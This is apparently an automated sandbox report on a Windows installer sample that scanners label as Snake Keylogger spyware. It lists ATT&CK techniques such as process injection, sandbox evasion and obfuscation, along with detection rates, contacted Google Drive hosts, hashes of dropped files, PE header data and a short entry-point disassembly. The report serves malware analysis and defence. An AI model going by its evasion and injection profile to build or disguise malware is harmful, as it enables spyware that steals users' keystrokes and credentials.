      Source: QNuQ5e175D.exe, 00000003.00000003.1617239451.0000000003A6F000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1768535254.0000000003A6B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1892630990.0000000003A6B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1757399705.0000000003A6B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1780110033.0000000003A6B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1791818626.0000000003A6B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000002.2562009711.0000000003A08000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1628221931.0000000003A6F000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1745863415.0000000003A6B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1881137157.0000000003A6B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: QNuQ5e175D.exe, 00000003.00000003.1617239451.0000000003A6F000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1768535254.0000000003A6B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1892630990.0000000003A6B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1757399705.0000000003A6B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1780110033.0000000003A6B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1791818626.0000000003A6B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1628221931.0000000003A6F000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1745863415.0000000003A6B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1881137157.0000000003A6B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000002.2562009711.0000000003A61000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW!
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeAPI call chain: ExitProcess graph end nodegraph_0-4195
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeAPI call chain: ExitProcess graph end nodegraph_0-4198
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 0_2_73B01BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_73B01BFF
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeProcess created: C:\Users\user\Desktop\QNuQ5e175D.exe "C:\Users\user\Desktop\QNuQ5e175D.exe"Jump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 0_2_00403552 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403552
      Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
      Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
      Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
      Execution: 1 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
      Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
      Privilege Escalation: 1 Access Token Manipulation; 11 Process Injection; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items
      Defense Evasion: 11 Masquerading; 1 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 DLL Side-Loading
      Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
      Discovery: 21 Security Software Discovery; 1 Virtualization/Sandbox Evasion; 2 File and Directory Discovery; 23 System Information Discovery; Internet Connection Discovery; Wi-Fi Discovery; Remote System Discovery
      Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
      Collection: 1 Archive Collected Data; 1 Clipboard Data; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
      Command and Control: 11 Encrypted Channel; 3 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port
      Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
      Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
      Source | Detection | Scanner | Label | Link
      QNuQ5e175D.exe | 64% | Virustotal | | Browse
      QNuQ5e175D.exe | 45% | ReversingLabs | Win32.Spyware.Snakekeylogger |

      Source | Detection | Scanner | Label | Link
      C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll | 0% | ReversingLabs | |
      C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll | 0% | Virustotal | | Browse
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      drive.google.com | 172.217.16.142 | true | false | | high
      drive.usercontent.google.com | 142.250.184.225 | true | false | | high
      Name | Source | Malicious | Antivirus Detection | Reputation
      https://www.google.com | QNuQ5e175D.exe | false | | high
      https://drive.usercontent.google.com/ | QNuQ5e175D.exe | false | | high
      https://drive.usercontent.google.com/Z | QNuQ5e175D.exe | false | | high
      https://apis.google.com | QNuQ5e175D.exe | false | | high
      http://nsis.sf.net/NSIS_ErrorError | QNuQ5e175D.exe | false | | high
      https://drive.google.com/i | QNuQ5e175D.exe | false | | high
      https://translate.google.com/translate_a/element.js | QNuQ5e175D.exe | false | | high
      https://drive.google.com/ | QNuQ5e175D.exe | false | | high
      https://drive.google.com/ube. | QNuQ5e175D.exe | false | | high
      https://drive.google.com/ertificates | QNuQ5e175D.exe | false | | high
      https://drive.google.com/Nr | QNuQ5e175D.exe | false | | high
                                https://drive.google.com/rQNuQ5e175D.exe, 00000003.00000003.2127459901.0000000003A7A000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1881033712.0000000003A82000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1925981246.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1937805348.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1948379458.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1847687586.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1903523473.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2138998807.0000000003A7A000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1892606488.0000000003A80000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1847731615.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2071438083.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2093555969.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1870054618.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1892558538.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1915071176.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2082212148.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2104101611.0000000003A7A000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1925952115.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 
00000003.00000003.2116216201.0000000003A78000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1937717326.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1870002480.0000000003A79000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
IP | Domain | Country | ASN | ASN Name | Malicious
142.250.184.225 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
172.217.16.142 | drive.google.com | United States | 15169 | GOOGLEUS | false
                                  Joe Sandbox version:42.0.0 Malachite
                                  Analysis ID:1588755
                                  Start date and time:2025-01-11 05:04:35 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 6m 22s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:8
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:QNuQ5e175D.exe
                                  renamed because original name is a hash value
                                  Original Sample Name:e5fd95536576d21b43b1552aed3040ea366375b5a952c333dd89f1ed251c12aa.exe
                                  Detection:MAL
                                  Classification:mal68.troj.evad.winEXE@3/5@2/2
                                  EGA Information:
                                  • Successful, ratio: 50%
                                  HCA Information:
                                  • Successful, ratio: 84%
                                  • Number of executed functions: 52
                                  • Number of non-executed functions: 64
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                  • Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.12.23.50
                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Execution Graph export aborted for target QNuQ5e175D.exe, PID 7988 because there are no executed function
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
23:06:01 | API Interceptor | 43x Sleep call for process: QNuQ5e175D.exe modified
Match: 37f463bf4616ecd445d4a1937da06e19
Associated Sample Name / URL | Detection | Threat Name | Context
iwEnYIOol8.exe | malicious | FormBook, GuLoader | 142.250.184.225, 172.217.16.142
Ntwph4urc1.exe | malicious | FormBook, GuLoader | 142.250.184.225, 172.217.16.142
2976587-987347589.07.exe | malicious | Nitol, Xmrig | 142.250.184.225, 172.217.16.142
2976587-987347589.08.exe | malicious | Nitol | 142.250.184.225, 172.217.16.142
Ntwph4urc1.exe | malicious | FormBook, GuLoader | 142.250.184.225, 172.217.16.142
2976587-987347589.08.exe | malicious | Unknown | 142.250.184.225, 172.217.16.142
yMXFgPOdf2.exe | malicious | GuLoader | 142.250.184.225, 172.217.16.142
2976587-987347589.07.exe | malicious | Unknown | 142.250.184.225, 172.217.16.142
yMXFgPOdf2.exe | malicious | GuLoader | 142.250.184.225, 172.217.16.142
02Eh1ah35H.exe | malicious | FormBook, GuLoader | 142.250.184.225, 172.217.16.142
Match: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll
Associated Sample Name / URL | Detection | Threat Name
ZoRLXzC5qF.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger
letsVPN.exe | malicious | Unknown
letsVPN.exe | malicious | Unknown
Revo.Uninstaller.Pro.v5.3.4.exe | malicious | Unknown
Revo.Uninstaller.Pro.v5.3.4.exe | malicious | Unknown
Documenti di spedizione.bat.exe | malicious | AgentTesla, GuLoader
Order NO 000293988494948595850000595995000.exe | malicious | AgentTesla, GuLoader
kelscrit.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger
FiddlerSetup.5.0.20245.10105-latest.exe | malicious | PureLog Stealer, zgRAT
HHn9tNeZd8.exe | malicious | GuLoader
                                                      Process:C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):12288
                                                      Entropy (8bit):5.804946284177748
                                                      Encrypted:false
                                                      SSDEEP:192:ljHcQ0qWTlt7wi5Aj/lM0sEWD/wtYbBjpNQybC7y+XZqE0QPi:R/Qlt7wiij/lMRv/9V4bfr
                                                      MD5:192639861E3DC2DC5C08BB8F8C7260D5
                                                      SHA1:58D30E460609E22FA0098BC27D928B689EF9AF78
                                                      SHA-256:23D618A0293C78CE00F7C6E6DD8B8923621DA7DD1F63A070163EF4C0EC3033D6
                                                      SHA-512:6E573D8B2EF6ED719E271FD0B2FD9CD451F61FC9A9459330108D6D7A65A0F64016303318CAD787AA1D5334BA670D8F1C7C13074E1BE550B4A316963ECC465CDC
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
• Antivirus: Virustotal, Detection: 0%
                                                      Joe Sandbox View:
• Filename: ZoRLXzC5qF.exe, Detection: malicious
• Filename: letsVPN.exe, Detection: malicious
• Filename: letsVPN.exe, Detection: malicious
• Filename: Revo.Uninstaller.Pro.v5.3.4.exe, Detection: malicious
• Filename: Revo.Uninstaller.Pro.v5.3.4.exe, Detection: malicious
• Filename: Documenti di spedizione.bat.exe, Detection: malicious
• Filename: Order NO 000293988494948595850000595995000.exe, Detection: malicious
• Filename: kelscrit.exe, Detection: malicious
• Filename: FiddlerSetup.5.0.20245.10105-latest.exe, Detection: malicious
• Filename: HHn9tNeZd8.exe, Detection: malicious
                                                      Reputation:moderate, very likely benign file
                                                      Process:C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      File Type:Matlab v4 mat-file (little endian) X, numeric, rows 0, columns 0
                                                      Category:dropped
                                                      Size (bytes):376884
                                                      Entropy (8bit):1.2538694993882065
                                                      Encrypted:false
                                                      SSDEEP:1536:eTJcpruMcjYX8Jf2lBD7XWqllCEYyZB0mFS04:eJcpPIYX8JonFS3
                                                      MD5:943DE1999A45C6772E1F2FB9E1803546
                                                      SHA1:542FC5B588D85BB0E7FCEED47789836A9C428984
                                                      SHA-256:1CCAB41F428AAB780F43CA2C25EB80A63755BD7977DFF975ED662FDB9672D515
                                                      SHA-512:A6AC5B8C7A1DBC2F06888E0F9285A6E1BD39A6C35E021BB5E3DC179E1EA176BEDDC7AD8C49CAEDDD7E10E232F980C7186E05DB890E001BA481E24E9D7EE4C434
                                                      Malicious:false
                                                      Reputation:low
                                                      Process:C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):222843
                                                      Entropy (8bit):7.362565451544298
                                                      Encrypted:false
                                                      SSDEEP:6144:gZ4ZblE1Ev2ugYpg+POgIPWJHbZeowW7H42LK:gZ4ZMEviYpgEHJHbwtKH422
                                                      MD5:20E1BC5AD88D5F2BE5A58EFC3EA1457B
                                                      SHA1:1099DBD1065F6958A014552FD0DF5D26CFF1CFB7
                                                      SHA-256:1FC0AA24E14AC6EA316ED1E1293D9F4B9B19047BCD5BAC97B35E2DB1AEDD7246
                                                      SHA-512:F97570AFF8D400CB300E05A4C57A8EA3D016FA9DC2675CAF89BFAB8B6465A2A021AA201B9E2CBD0472136207B4F92E20775EAF81BB0C926549FE7DD452B260D7
                                                      Malicious:false
                                                      Reputation:low
                                                      Process:C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):37114
                                                      Entropy (8bit):4.648205422140126
                                                      Encrypted:false
                                                      SSDEEP:384:z0GZqpL6AJbzyEyPpyOFYqjG3YL3BM6doOGNblZ9bQZkCC90fFjrBv26dUayacAM:IGKzaZFYqC3500310fhdKtz
                                                      MD5:A2C20BC4DA366C09E9FD86704A33CB0C
                                                      SHA1:91A57F0DDBE7C4E7556BA38BB2CFC8C8C5B52CEC
                                                      SHA-256:2BF4E12311D437A5B61F085C80ED3B3A8C29E77674DAC41F4829E4251C3878A1
                                                      SHA-512:27ADF3C40D1B3583D4104DB2E5A221F0963A25DB7C593426556493EC536C24F2B7866A8B7DF69F8E4127DAE78510B4FC7CAF65660EE2F25EE791C3480E38532B
                                                      Malicious:false
                                                      Reputation:low
                                                      Process:C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):437967
                                                      Entropy (8bit):1.2496824675371185
                                                      Encrypted:false
                                                      SSDEEP:768:YszAIbEHsrUdiWwGdV5C+P4/1F93McF1TWcY7hYu4nR/CFxofOrNYSOq5HGieGwO:YJkFhJAhX55ckvF4ULrV2Ehr3gra5
                                                      MD5:0695A340DE7C3F5F45036C9C9EAFDBD2
                                                      SHA1:D741BBBBFAD62B1D85E87CEDD3F344F4062C33D6
                                                      SHA-256:0020F3470C29CAC49F8521309D6DA437EC6F71B2F5BD41A7B5DD88788B5AC25F
                                                      SHA-512:D2668C1016BBE3DF9CE638D834AA13CC1100D4B85FCB4AC7396DA8166B50F0B2AF0A9025BA35D54A865EC87F356EEEB7A577B000B9B50F8ECC996B3E798CF145
                                                      Malicious:false
                                                      Reputation:low
                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                      Entropy (8bit):7.407220190167989
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:QNuQ5e175D.exe
                                                      File size:585'064 bytes
                                                      MD5:9bb2cdb8508ee2255a35ecec43462a48
                                                      SHA1:c7465e8b0a3ae61b23520752afbb8bf89a3cecdd
                                                      SHA256:e5fd95536576d21b43b1552aed3040ea366375b5a952c333dd89f1ed251c12aa
                                                      SHA512:0b8e8399eb04372c1cb70467dca25078ab255d01c448fa7ccabd620d9066306a1127c4e5caa4af66226662bb3b2d143045b9212332e7408c7b97ea40672a0ac1
                                                      SSDEEP:12288:ifYfUlNHYh6EEfqUhn5i5mfQAsS+6ePZxIgLF7eEbH+aj:ifYMPYcqUhY5mp9+6ehxIg5H9j
                                                      TLSH:E0C4F0257614AC5AC4EC10358BDDDE7B07630F6A7B6C521F73C4BE4C7AB9A816922323
                                                      Icon Hash:016c4c4ebe99dd65
                                                      Entrypoint:0x403552
                                                      Entrypoint Section:.text
                                                      Digitally signed:true
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x660843FB [Sat Mar 30 16:55:23 2024 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f4639a0b3116c2cfc71144b88a929cfd
                                                      Signature Valid:false
                                                      Signature Issuer:CN=nonconverging, O=nonconverging, L=Cliff, C=US
                                                      Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                      Error Number:-2146762487
                                                      Not Before, Not After
                                                      • 18/03/2024 08:00:38 18/03/2027 08:00:38
                                                      Subject Chain
                                                      • CN=nonconverging, O=nonconverging, L=Cliff, C=US
                                                      Version:3
                                                      Thumbprint MD5:B0E922076FFE2DF5FE70C6AC8CD556A2
                                                      Thumbprint SHA-1:CE784EA178F07EE5869E76F3117DD8B531152C79
                                                      Thumbprint SHA-256:B8488CDBED36172DB2D61C9AB8ED59564E9285624F8AE446AA90892EF78FB1EC
                                                      Serial:5A5D66BB316E150417CDF6D37A5D77AE424A4754
                                                      Instruction
                                                      sub esp, 000003F8h
                                                      push ebp
                                                      push esi
                                                      push edi
                                                      push 00000020h
                                                      pop edi
                                                      xor ebp, ebp
                                                      push 00008001h
                                                      mov dword ptr [esp+20h], ebp
                                                      mov dword ptr [esp+18h], 0040A2D8h
                                                      mov dword ptr [esp+14h], ebp
                                                      call dword ptr [004080A4h]
                                                      mov esi, dword ptr [004080A8h]
                                                      lea eax, dword ptr [esp+34h]
                                                      push eax
                                                      mov dword ptr [esp+4Ch], ebp
                                                      mov dword ptr [esp+0000014Ch], ebp
                                                      mov dword ptr [esp+00000150h], ebp
                                                      mov dword ptr [esp+38h], 0000011Ch
                                                      call esi
                                                      test eax, eax
                                                      jne 00007F74F0BCEC4Ah
                                                      lea eax, dword ptr [esp+34h]
                                                      mov dword ptr [esp+34h], 00000114h
                                                      push eax
                                                      call esi
                                                      mov ax, word ptr [esp+48h]
                                                      mov ecx, dword ptr [esp+62h]
                                                      sub ax, 00000053h
                                                      add ecx, FFFFFFD0h
                                                      neg ax
                                                      sbb eax, eax
                                                      mov byte ptr [esp+0000014Eh], 00000004h
                                                      not eax
                                                      and eax, ecx
                                                      mov word ptr [esp+00000148h], ax
                                                      cmp dword ptr [esp+38h], 0Ah
                                                      jnc 00007F74F0BCEC18h
                                                      and word ptr [esp+42h], 0000h
                                                      mov eax, dword ptr [esp+40h]
                                                      movzx ecx, byte ptr [esp+3Ch]
                                                      mov dword ptr [004347B8h], eax
                                                      xor eax, eax
                                                      mov ah, byte ptr [esp+38h]
                                                      movzx eax, ax
                                                      or eax, ecx
                                                      xor ecx, ecx
                                                      mov ch, byte ptr [esp+00000148h]
                                                      movzx ecx, cx
                                                      shl eax, 10h
                                                      or eax, ecx
                                                      movzx ecx, byte ptr [esp+0000004Eh]
                                                      Programming Language:
                                                      • [EXP] VC++ 6.0 SP5 build 8804

| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8608 | 0xa0 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x68000 | 0x2ac78 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x8e460 | 0x908 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2a8 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x68f8 | 0x6a00 | 595406ea4e71ef6f8675a1bd30bcc8f9 | False | 0.6703272405660378 | data | 6.482222402519068 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x8000 | 0x1464 | 0x1600 | a995b118b38426885fc6ccaa984c8b7a | False | 0.4314630681818182 | data | 4.969091535632612 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0xa000 | 0x2a818 | 0x600 | 7a91ec9f1c18e608c3f3f503ba4191c1 | False | 0.5221354166666666 | data | 4.165541189894117 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .ndata | 0x35000 | 0x33000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x68000 | 0x2ac78 | 0x2ae00 | 07533466c1ba02253abde419e160f487 | False | 0.43160076530612246 | data | 5.193823090904089 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0x68448 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.3483526558618242 |
| RT_ICON | 0x78c70 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.44647361782636114 |
| RT_ICON | 0x82118 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States | 0.4737060998151571 |
| RT_ICON | 0x875a0 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.44355219650448746 |
| RT_ICON | 0x8b7c8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.5286307053941909 |
| RT_ICON | 0x8dd70 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.5811444652908068 |
| RT_ICON | 0x8ee18 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.5748933901918977 |
| RT_ICON | 0x8fcc0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.6860655737704918 |
| RT_ICON | 0x90648 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.7224729241877257 |
| RT_ICON | 0x90ef0 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.49146341463414633 |
| RT_ICON | 0x91558 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.5440751445086706 |
| RT_ICON | 0x91ac0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.7668439716312057 |
| RT_ICON | 0x91f28 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.6263440860215054 |
| RT_ICON | 0x92210 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.7128378378378378 |
| RT_DIALOG | 0x92338 | 0x100 | data | English | United States | 0.5234375 |
| RT_DIALOG | 0x92438 | 0x11c | data | English | United States | 0.6091549295774648 |
| RT_DIALOG | 0x92558 | 0x60 | data | English | United States | 0.7291666666666666 |
| RT_GROUP_ICON | 0x925b8 | 0xca | data | English | United States | 0.6237623762376238 |
| RT_VERSION | 0x92688 | 0x2b0 | data | English | United States | 0.5232558139534884 |
| RT_MANIFEST | 0x92938 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795 |

| DLL | Import |
|---|---|
| ADVAPI32.dll | RegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW |
| SHELL32.dll | SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW |
| ole32.dll | CoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree |
| COMCTL32.dll | ImageList_Destroy, ImageList_AddMasked, ImageList_Create |
